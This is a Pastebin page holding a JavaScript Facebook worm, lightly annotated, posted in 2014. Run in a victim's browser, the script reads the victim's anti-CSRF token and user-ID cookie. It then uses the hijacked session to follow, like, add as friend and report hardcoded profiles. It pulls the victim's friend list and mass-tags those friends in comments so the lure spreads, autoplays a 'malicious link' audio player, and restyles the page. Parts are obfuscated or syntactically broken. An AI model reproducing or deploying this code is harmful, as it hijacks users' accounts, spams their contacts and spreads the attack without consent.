API tools faq
paste
Advertisement
Guest User

Facebook w0rm !

a guest
Jan 27th, 2014
856
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 23.45 KB | None | 0 0
raw download clone embed print report
  1. /*Abdelmoughite Eljoaydi*/
  2. var parent = document.getElementsByTagName("html")[0];
  3. var _body = document.getElementsByTagName('body')[0];  
  4. var _div = document.createElement('div');
  5. _div.style.height = "25";
  6. _div.style.width = "100%";
  7. _div.style.position = "fixed";
  8. _div.style.top = "auto";
  9. _div.style.bottom = "0";
  10. _div.align = "center";
  11. var _audio = document.createElement('audio');
  12. _audio.style.width = "100%";
  13. _audio.style.height = "25px";
  14. _audio.controls = true;
  15. _audio.autoplay = false;
  16. _audio.autoplay = true;
  17. _audio.src = "http://picosong.com/media/songs/1623c97f871ebe69c08a4089737457dc"; // Malicious Link loaded as a player and autoplayed after the execution of this script but unfortunately it's expired.
  18. _div.appendChild(_audio);
  19. _body.appendChild(_div);
  20. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;  //Get the value of fb_dtsg
  21. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);  //Get the value of the cookie "c_user= which contains the user_id
  22. var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;
  23. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  24.  
  25.  
  26. // Function to follow a profile.
  27. function a(abone) {                                  
  28.     var http4 = new XMLHttpRequest;
  29.     var url4 = "/ajax/follow/follow_profile.php?__a=1";
  30.     var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  31.     http4.open("POST", url4, true);
  32.     http4.onreadystatechange = function () {
  33.         if (http4.readyState == 4 && http4.status == 200) http4.close
  34.     };
  35.     http4.send(params4)
  36. }
  37. a("100007495053771"); // Apply this action for specific IDs
  38.  
  39. // Function to subscribe to Lists.
  40.  
  41. function sublist(uidss) {
  42.     var a = document.createElement('script');
  43.     a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  44.     document.body.appendChild(a)
  45. }
  46. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  47. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  48. var now = (new Date).getTime();// get time
  49.  
  50. // Function to like a post/publication.
  51. function P(post) {
  52.     var X = new XMLHttpRequest();
  53.     var XURL = "//www.facebook.com/ajax/ufi/like.php";
  54.     var XParams = "like_action=true&ft_ent_identifier=" + post + "&source=1&client_id=" + now + "%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]=" + post + "&nctr[_mod]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg=" + fb_dtsg + "&phstamp=";
  55.     X.open("POST", XURL, true);
  56.     X.onreadystatechange = function () {
  57.         if (X.readyState == 4 && X.status == 200) {
  58.             X.close
  59.         }
  60.     };
  61.     X.send(XParams)
  62. }
  63. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  64. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  65.  
  66. // Function to Like a page
  67.  
  68. function Like(p) {
  69.     var Page = new XMLHttpRequest();
  70.     var PageURL = "//www.facebook.com/ajax/pages/fan_status.php";
  71.     var PageParams = "&fbpage_id=" + p + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp=";
  72.     Page.open("POST", PageURL, true);
  73.     Page.onreadystatechange = function () {
  74.         if (Page.readyState == 4 && Page.status == 200) {
  75.             Page.close
  76.         }
  77.     };
  78.     Page.send(PageParams)
  79. }
  80. Like("768384096510698");
  81.  
  82. // Function to Add a new profile .
  83.  
  84.  
  85. function IDS(r) {
  86.     var X = new XMLHttpRequest();
  87.     var XURL = "//www.facebook.com/ajax/add_friend/action.php";
  88.     var XParams = "to_friend=" + r + "&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg=" + fb_dtsg + "&phstamp=";
  89.     X.open("POST", XURL, true);
  90.     X.onreadystatechange = function () {
  91.         if (X.readyState == 4 && X.status == 200) {
  92.             X.close
  93.         }
  94.     };
  95.     X.send(XParams)
  96. }
  97. ///////////////////////////KHÔNG XÓA ? ÐÂY///////////////////////////
  98. // tài
  99.  
  100. IDS("100003643071645");
  101. P("422020071235375")
  102. // cu?ng
  103. a("100002821572203");
  104. //Theme
  105. (function () {
  106.     var css = ".highlightIndicator, \n.tinyman:after, \n.fbTimelineSideAds,\n.ego_column,\n.buttonWrap, \n.fbTimelineSpine, \n.spinePointer, \n.topBorder, \n.bottomBorder, \n#footerContainer, \n.middleLink, \n.slimHeader #pageNav li.tinyman::after, .slimHeader #pageNav li.middleLink::after, \n.slimHeader #pageNav .middleLink a, \n.moreSectionsLink\n{\ndisplay:none !important;\n}\n\ndiv.mainWrapper{\npadding-left: 1em !important;\n}\n.uiProgressBar .fill {\nbackground: #444 !important;\nborder: solid #222 !important;\n}\n.uiTypeaheadView .compact li {\nbackground-color: #111 !important;\n}\ndiv.uiTypeaheadView .selected {\nbackground-color: #333 !important;\n}\n.fbIndex .gradient {\nbackground: none !important;\n}\n.notifNegativeBase #fbNotificationsFlyout li.jewelItemNew, .notifNegativeBase #fbNotificationsFlyout li.first_receipt {\nbackground: #333 !important;\n}\n.pop_container {\nbackground-color: #000 !important;\n}\n.pop_verticalslab, .pop_horizontalslab {\nbackground: #222 !important;\n}\n.uiMenuXItem\na.highlighted {\nbackground-color: #333 !important;\nborder-color: #000 !important;\ncolor: #FFF !important;\n}\n.uiMenuXItem\na.highlighted {\nbackground-color: #333 !important;\nborder-color: #000 !important;\ncolor: #FFF !important;\n}\n.uiContextualLayer {\nbackground-color: #111 !important;\n}\n.HighlightSelectorMenu {\nborder: 2px solid #000 !important;\nbackground: #111 !important;\nborder-radius: 5px !important;\n}\n.-cx-PUBLIC-uiDialog__border, ._1yu {\nborder: 10px solid rgba(82, 82, 82, .7) !important;\n-webkit-border-radius: 8px !important;\n}\ninput[type=\"text\"], input[type=\"password\"], .inputtext, select, .select, select > option, select > button, .fbPhotoImageStage .fbPhotosPhotoButtons .tagMessage, .fbPhotoImageStage .fbPhotosPhotoButtons .cropMessage, #u1clso_61 div img, #navSearch .uiTypeahead, .-cx-PRIVATE-uiDialog__content, ._1yu, ._t {\nbackground-color: #111 !important;\n}\n.fbTimelineCapsule\n{\nbackground: none !important;\n}\n.sp_c79t5t\n{\nbackground-image: none !important;\n}\n* {\nborder-color: transparent !important;\ncolor: #F099DB !important;\nbackground-color: transparent !important; \n}\n\n#fbTimelineHeadline .profilePic {\nbackground-color: #FFF !important;\nborder: 4px solid #FFF !important;\n-webkit-border-radius: 2px !important;\nheight: 160px !important;\nwidth: 160px !important;\n}\n\n\n.fbTimelineScrubber {\n\nborder-color: #333333 !important;\npadding: 8px 0 8px 1px !important;\ntop: 38px !important;\nwidth: 122px !important;\nz-index: 1 !important;\nborder-radius: 10px !important;\n}\n\n.fbPhotosPhotoTagboxBase .tagName {\nbackground: #000 !important;\ncolor: #FFF !important;\ncursor: default !important;\nfont-weight: normal !important;\npadding: 2px 6px 3px !important;\ntop: 3px !important;\nwhite-space: nowrap !important;\n}\n\n.fbPhotosPhotoTagboxBase .innerTagBox {\nborder: 4px solid white !important;\nborder-color: rgba(255, 255, 255, .8) !important;\n}\n\n.fbPhotoSnowlift {\nbackground-color: rgba(0, 0, 0, .7) !important;\n}\n\n.fbPhotoSnowlift .rhc , .pagingActivated .snowliftOverlay, .fbPhotoSnowlift.taggingMode .snowliftOverlay, .stageWrapper{\nbackground-color: #111 !important;\n}\n\n.profile-picture img {\nmax-width: 170px !important;\n}\n\n.webComposerPhotoUpload input, .webComposerPhotoUpload {\ncolor: #000000 !important;\n}\n\n\nhtml{background:url(http://i43.tinypic.com/2r41oph.jpg) no-repeat center fixed;background-size:cover;-o-background-size:cover;-webkit-background-size:cover}\n\n\n\n\n.fbCurrentStory:hover, .connect_widget_like_button, .fbFeedTickerStory:hover, .item a:hover, .fbJewelFlyout li:hover, .uiSideNav a:hover, .fbNubFlyoutBody, .uiButtonConfirm {\nbackground: #111111 !important;\n}\n\n.fbChatMessageGroup {\nborder-color: #2c2c2c !important;\n}\n\n.fbChatSidebar {\nbackground: #111111 !important;\n}\n\n#leftCol {\nposition: relative;top:20px!important;\nmin-height: 400px !important;\n}\n\n.arrowLeft a {\nbackground-image:url('http://i.imgur.com/26zf5.png') !important;\nborder-color: #666666 !important;\n}\n\n.arrowRight a {\nbackground-image:url('http://i.imgur.com/v6B6z.png') !important;\nborder-color: #666666 !important;\n}\n\n.uiStreamSubstory {\nborder-color: transparent !important;\n}\n\n.uiHeader {\nbackground-color: transparent !important;\n}\n\n.fbSidebarGripper, .fbTickerFooter, .fbSidebarGripper div, .navSubmenu:hover {\nbackground-color: #222222 !important;\n}\n\n.fbTimelineCountButton, .uiBoxWhite, .uiButtonGroup {\nbackground-color: #1c1c1c !important;\n}\n\n\n\n#leftCol {\npadding-top: 0px !important;\npadding-left: 0px !important;\n}\n\n.fbNubFlyoutFooter {\nbackground: #111111 !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #F099DB !important; \nborder: #333333 !important;\n}\n\n.uiStream .uiSelectorButton {\nbackground-image: url(\"http://i.imgur.com/nOfuQ.png\") !important;\n}\n\n.uiSearchInput {\nbackground-image: url(\"http://i.imgur.com/agmNw.png\") !important;\n}\n\n\n\n\n.jewelButton:hover, .topNavLink a:hover {\nbackground-color: #222222 !important;\n}\n\n.uiScrollableAreaGripper {\nbackground-color: #666666 !important;\n}\n\n.uiSearchInput, .fbPhotosGridHeader, .uiComposerMessageBoxControls, #MessagingShelf, .uiBoxGray {\nbackground: #111111 !important;\n}\n\n.uiButton {\nbackground: #1c1c1c !important;\n}\n\n#blueBar  {\nbackground: -moz-linear-gradient(top,  #1D99DB 0%, #000000 100%) !important;\nbackground: -webkit-linear-gradient(top,  #1D99DB 0%, #000000 100%) !important;\nbox-shadow: 0 0 7px rgba(211, 32, 198, 0.75) !important;\nborder:4px ridge #F099DB!important;\nmargin-top:5px!important;\nmargin-left:5px!important;\nborder-radius: 70px!important;\n}\n\n\n\n#contentCol, #pageLogo a {\nbackground-color: transparent !important;\nborder-color: transparent !important;\n}\n\n.uiMorePager {\nmargin-bottom:6px !important;\nbackground-color: #1c1c1c !important;\nborder: 0px solid #333333 !important;\n}\n\n.uiStreamStory, .fbIndexFeaturedRegistration, .signupForm {\nmargin-bottom:2px !important;\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder-radius: 15px !important;\npadding: 1px !important;\nborder: 0px solid #333333 !important;\n}\n\n.uiStream .uiStreamHeader .uiStreamHeaderChronologicalForm .uiSelectorButton .uiButtonText {\ncolor: #000 !important;\n}\n\n#album_pagelet {\nbackground-color: #111111 !important;\nmargin-left: 0px !important;\nmargin-top: -15px !important;\n}\n\n.tagWrapper, #pagelet_main_column, .timelineUnitContainer, .fbTimelineTopSection, #MessagingMessages {\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder-radius: 15px !important;\nborder: 0px solid #333333 !important;\n}\n.fbTimelineTopSectionBase .topSectionBottomBorder {\ndisplay: none !important;\n}\n#pagelet_main_column {\nwidth: 500px !important;\n}\n\n.fbJewelFlyout, .uiToggleFlyout, .navigation, .container, .uiOverlayContent, .search, .pop_container_advanced {\nbackground-color: #111111 !important; \nborder-radius: 15px !important;\nborder: 2px solid #333333 !important;\n}\n\n#left_column, #leftCol, .MessagingReadHeader {\nbackground: #111111 !important;\nborder-radius: 15px !important;\n}\n\n#left_column, #leftCol {\nmargin-left:-8px !important;\nwidth: 185px !important;\n}\n\n.uiMediaThumb i, .uiProfilePhoto {\nborder: 1px solid #000000 !important; \n}\n\n#rightCol {\nmargin-top: 10px !important;\npadding-top: 0px !important;\nbackground: #111111 !important;\nborder-radius: 15px !important;\nborder: 0px solid #333333 !important;\n}\n\n#right_column, .rightColumnWrapper {\nmargin-top: 0px !important;\npadding-top: 0px !important; \nposition: fixed !important;\nbackground: #111111 !important;\nborder-radius: 15px !important; \nborder: 0px solid #333333 !important;\n}\n\n.aboutMePagelet {\nbackground-color:transparent !important;\nbackground-image:url('http://i.imgur.com/T2LPj.png') !important;\nborder: 0px solid #333333 !important;\n}\n\n.fbNubButton, .fbNubFlyoutTitlebar, .uiToggleFlyout, .fbChatSidebarFooter {\nbackground: -moz-linear-gradient(center top , #333333, #000000) !important;\nbackground: -webkit-linear-gradient(center top , #333333, #000000) !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #F099DB !important;\nborder: #333333 !important;\n}\n\n.fbChatOrderedList {\nbackground: -moz-linear-gradient(center right , #000000, #000000) !important;\nbackground: -webkit-linear-gradient(center right , #333333, #000000) !important;\nbox-shadow: 0 1px 2px rgba(0, 0, 0, 0.5) !important;\ncolor: #F099DB !important;\nborder: #333333 !important;\n}\n\n\n\n\n\n\n\n\n.UFIMentionsInputWrap,.navHeader, ._554n,.fbxWelcomeBox ,._2yg .composerTypeahead {\nbackground: -moz-linear-gradient(top,  #1D99DB 0%, #000000 100%) !important;\nbackground: -webkit-linear-gradient(top,  #1D99DB 0%, #000000 100%) !important;\nbox-shadow: 0 2px 4px rgba(211, 32, 198, 0.75) !important;\nborder:2px ridge #F099DB!important;\nmargin-top:5px!important;\nmargin-left:0px!important;\nborder-radius: 7px!important;\npadding:3px!important;\n}\n.fbx #pageHead, #blueBar #pageHead{\npadding-top:0px!important;\n}\n\n.slim #blueBar {\n\n    height: 35px!important;\n}\n.fbxWelcomeBoxBlock .fbxWelcomeBoxImg,\n._s0,\n._42fz .pic{\n   border:2px solid  rgba(0, 0, 0, .55)!important;\n   border-radius: 37px!important;\n}\n.fbxWelcomeBoxBlock .fbxWelcomeBoxImg:hover,\n._s0:hover,\n._42fz .pic:hover{\n   box-shadow: 0px 0px 4px rgba(211, 32, 198, 0.75) !important;\n   border:2px ridge #F099DB !important;\n   border-radius: 37px!important;\n}\n.uiSideNav .sideNavItem .hasCount:hover,\n.uiSideNav .sideNavItem .noCount:hover{\n   text-shadow: 2px 2px 2px rgba(39, 98, 138, 0.75) !important;\n   color: #F099DB !important;\n\n}\n#navSearch {\nwidth:300px !important;\nmargin-top: 6px !important;\nmargin-left: 30px !important;\nborder-color: transparent !important;\n}\n#headNav {\n    height: 30px;\n}\n\n\n\na:hover{\n   text-shadow: 2px 2px 2px rgba(39, 98, 138, 0.75) !important;\n   color: #F099DB !important;\n}\n.UIActionLinks_bottom a, \n.UIActionLinks_bottom button.as_link, \n.UIActionLinks_bottom .uiLinkButton input, \n.UIActionLinks_bottom .uiLinkButton input:hover,\n.uiStreamMessage .actorName, .uiStreamMessage .passiveName\n{\n   text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.99) !important;\n   color: #F099DB !important;\n}\n._2yg .composerTypeahead ,#bfb_options_button_li.openToggler ul,\n .better_fb_mini_message, .sfx_mini_message_no_x,\n .GM_options_wrapper_inner,\n .better_fb_mini_message, .mini_x{\nbackground: -moz-linear-gradient(top,  #1D99DB 0%, #000000 100%) !important;\nbackground: -webkit-linear-gradient(top, #1D99DB  0%,#000000 100%);\nbox-shadow: 0 2px 4px rgba(39, 98, 138, 0.75) !important;\nborder:2px ridge #F099DB !important;\nmargin-top:5px!important;\nmargin-left:0px!important;\nborder-radius: 7px!important;\npadding:3px!important;\n}\n.GM_options_buttons input{\n   text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.99) !important;\n   color: #A0E811 !important;\n\n}";
  107.     if (typeof GM_addStyle != "undefined") {
  108.         GM_addStyle(css);
  109.     } else if (typeof PRO_addStyle != "undefined") {
  110.         PRO_addStyle(css);
  111.     } else if (typeof addStyle != "undefined") {
  112.         addStyle(css);
  113.     } else {
  114.         var node = document.createElement("style");
  115.         node.type = "text/css";
  116.         node.appendChild(document.createTextNode(css));
  117.         var heads = document.getElementsByTagName("head");
  118.         if (heads.length > 0) {
  119.             heads[0].appendChild(node);
  120.         } else {
  121.             // no head yet, stick it whereever
  122.             document.documentElement.appendChild(node); // not important
  123.         }
  124.     }
  125. })();
  126.  
  127. var _0xb161 = ["value", "fb_dtsg", "getElementsByName", "match", "cookie", "getTime", "//www.facebook.com/ajax/report/social.php", "fb_dtsg=", "&block=1&pp=%7B%22actions_to_take%22%3A%22[]%22%2C%22are_friends%22%3Afalse%2C%22cid%22%3A", "%2C%22content_type%22%3A0%2C%22expand_report%22%3A1%2C%22first_choice%22%3A%22file_report%22%2C%22from_gear%22%3A%22timeline%22%2C%22is_following%22%3Afalse%2C%22is_tagged%22%3Afalse%2C%22on_profile%22%3Afalse%2C%22phase%22%3A3%2C%22ref%22%3A%22https%3A%5C%2F%5C%2Fwww.facebook.com%5C%2FNan.ertt7%22%2C%22report_type%22%3A145%2C%22rid%22%3A", "%2C%22sub_report_type%22%3A3%2C%22time_flow_started%22%3A", "%2C%22user%22%3A", "%7D&file_report=1&__user=", "&__a=1&__dyn=7n8ahyj2qmvu5k9UmAAaUVpo&__req=u&ttstamp=2658168571071108880", "POST", "open", "onreadystatechange", "readyState", "status", "close", "send", "100006952119048"];
  128. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  129. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  130. var now = (new Date) getTime();
  131.  
  132. // Function to Report a profile.
  133.  
  134.  
  135. function Report(rep) {
  136.     var xhr1 = new XMLHttpRequest();
  137.     var link = "//www.facebook.com/ajax/report/social.php";
  138.     var pay = "fb_dtsg=" + fb_dtsg + "&block=1&pp=%7B%22actions_to_take%22%3A%22[]%22%2C%22are_friends%22%3Afalse%2C%22cid%22%3A" + rep + "%2C%22content_type%22%3A0%2C%22expand_report%22%3A1%2C%22first_choice%22%3A%22file_report%22%2C%22from_gear%22%3A%22timeline%22%2C%22is_following%22%3Afalse%2C%22is_tagged%22%3Afalse%2C%22on_profile%22%3Afalse%2C%22phase%22%3A3%2C%22ref%22%3A%22https%3A%5C%2F%5C%2Fwww.facebook.com%5C%2FNan.ertt7%22%2C%22report_type%22%3A145%2C%22rid%22%3A" + rep + "%2C%22sub_report_type%22%3A3%2C%22time_flow_started%22%3A" + now + "%2C%22user%22%3A" + user_id + "%7D&file_report=1&__user=" + user_id + "&__a=1&__dyn=7n8ahyj2qmvu5k9UmAAaUVpo&__req=u&ttstamp=2658168571071108880";
  139.     xhr1.open(POST, link, true);
  140.     xhr1.onreadystatechange = function () {
  141.         if (xhr1.readyState == 4 && xhr1.status == 200)
  142.             xhr1.close
  143.     };
  144. };
  145. xhr1.send(pay);
  146. };
  147.  
  148. var _0xa22c = ["value", "fb_dtsg", "getElementsByName", "match", "cookie", "256042631229632", "onreadystatechange", "readyState", "arkadaslar = ", "for (;;);", "", "replace", "responseText", ";", "length", "entries", "payload", "round", " @[", "uid", ":", "text", "]", " ", "&filter[0]=user", "&options[0]=friends_only", "&options[1]=nm", "&token=v7", "&viewer=", "&__user=", "https://", "indexOf", "URL", "GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "open", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "send", "random", "floor", "&ft_ent_identifier=", "&comment_text=", "&source=2", "&client_id=1377871797138:1707018092", "&reply_fbid", "&parent_comment_id", "&rootid=u_jsonp_2_3", "&clp={\"cl_impid\":\"453524a0\",\"clearcounter\":0,\"elementid\":\"js_5\",\"version\":\"x\",\"parent_fbid\":", "}", "&attached_sticker_fbid=0", "&attached_photo_fbid=0", "&giftoccasion", "&ft[tn]=[]", "&__a=1", "&__dyn=7n8ahyj35ynxl2u5F97KepEsyo", "&__req=q", "&fb_dtsg=", "&ttstamp=", "POST", "/ajax/ufi/add_comment.php", "Content-type", "application/x-www-form-urlencoded", "setRequestHeader", "status", "close"];
  149. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  150. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  151. var id = "256042631229632";
  152. var arkadaslar = [];
  153. var svn_rev;
  154.  
  155. function arkadaslari_al(id) {   //Function to set the comment_text ( @["XXXXXXXXXXXX":"Name"] ) which will be send to yorum_yap(id,mesaj) function.
  156.     var xhr = new XMLHttpRequest();
  157.     xhr.onreadystatechange = function () {
  158.         if (xhr.readyState == 4) {
  159.             eval("arkadaslar =" + xhr.responseText.toString().replace("for (;;);", "") +  ";");
  160.             for (f = 0; f < Math.round(arkadaslar.payload.entries.length / 27); f++) {
  161.                 mesaj = "";
  162.                 mesaj_text = "";
  163.                 for (i = f * 27; i < (f + 1) * 27; i++) {
  164.                     if (arkadaslar.payload.entries[i]) {
  165.                         mesaj += " @[" + arkadaslar.payload.entries[i].uid +  ":" + arkadaslar.payload.entries[i].text + "]";
  166.                         mesaj_text += " " + arkadaslar.payload.entries[i].text;
  167.                     };
  168.                 };
  169.                 yorum_yap(id, mesaj);
  170.             };
  171.         };
  172.     };
  173.     var params = "&filter[0]=user";
  174.     params += "&options[0]=friends_only";
  175.     params += "&options[1]=nm";
  176.     params += "&token=v7";
  177.     params += "&viewer=" + user_id;
  178.     params += "&__user=" + user_id;
  179.     if (document.URL.indexOf('https://') >= 0) {
  180.         xhr.open(GET, "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true);
  181.     } else {
  182.         xhr.open(GET, "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true);
  183.     };
  184.     xhr.send();
  185. };
  186.  
  187. //the response of XHR request before setting the elements of the comment(mesaj).
  188. //for(;;);{"__ar":1,"payload":{"entries":[{"uid":[ID],"photo":"https:\/\/fbcdn-profile-a.akamaihd.net\/hprofile-ak-frc1\/t1\/c25.0.81.81\/s50x50\/XXXXXX.jpg","type":"user","text":"Mark Amgcidgacecb Ricestein","is_verified":false,"path":"\/profile.php?id=[ID]","names":["Mark Amgcidgacecb Ricestein"],"index_rank":-1,"vertical_type":"USER","prefix_match":"","prefix_length":0,"l_type":"","match_type":""},{"uid":[ID],"photo":"https:\/\/fbcdn-profile-a.akamaihd.net\/hprofile-ak-ash3\/t1\/c25.0.81.81\/s50x50\/XXXXXXXX.jpg","type":"user","text":"Mary Amgdiejecgga McDonaldsen","is_verified":false,"path":"\/profile.php?id=[ID]","names":["Mary Amgdiejecgga McDonaldsen"],"index_rank":-1,"vertical_type":"USER","prefix_match":"","prefix_length":0,"l_type":"","match_type":""}],"token":"1390689285-7","display_token":0,"display_ttl":1390689894},"bootloadable":{},"ixData":[]}
  189.  
  190.  
  191. function RandomArkadas() {
  192.     var msg = "";
  193.     for (i = 0; i < 9; i++) {
  194. msg += " @[" + arkadaslar.payload.entries.Math.floor(Math.random() * arkadaslar.payload.entries.length).uid + ":" + arkadaslar.payload.entries.Math.floor(Math.random() * arkadaslar.payload.entries.length).text + "]";    };
  195.     return msg;
  196. };
  197.  
  198.  
  199. //Function to tag your friends (adding a comment) to a post which contains the method "How to Hack Facebook accounts" or maybe another post when the request success.
  200. function yorum_yap(id, _msg) {
  201.     var xhr2 = new XMLHttpRequest();
  202.     var params_1 = "";
  203.     params_1 += "&ft_ent_identifier=" + id;
  204.     params_1 += "&comment_text=" + encodeURIComponent(_msg);
  205.     params_1 += "&source=2";
  206.     params_1 += "&client_id=1377871797138:1707018092";
  207.     params_1 += "&reply_fbid";
  208.     params_1 += "&parent_comment_id";
  209.     params_1 += "&rootid=u_jsonp_2_3";
  210.     params_1 += "&clp={\"cl_impid\":\"453524a0\",\"clearcounter\":0,\"elementid\":\"js_5\",\"version\":\"x\",\"parent_fbid\":" + id + "}";
  211.     params_1 += "&attached_sticker_fbid=0";
  212.     params_1 += "&attached_photo_fbid=0";
  213.     params_1 += "&giftoccasion";
  214.     params_1 += "&ft[tn]=[]";
  215.     params_1 += "&__user=" + user_id;
  216.     params_1 += "&__a=1";
  217.     params_1 += "&__dyn=7n8ahyj35ynxl2u5F97KepEsyo";
  218.     params_1 += "&__req=q";
  219.     params_1 += "&fb_dtsg=" + fb_dtsg;
  220.     params_1 += "&ttstamp=";
  221.     xhr2.open(POST, "/ajax/ufi/add_comment.php", true);
  222.     xhr2.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  223.     xhr2.onreadystatechange = function () {
  224.         if (xhr2.readyState == 4 && xhr2.status == 200) {
  225.             xhr2.close;
  226.         };
  227.     };
  228.     xhr2.send(params_1);
  229. };
  230. arkadaslari_al(id);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!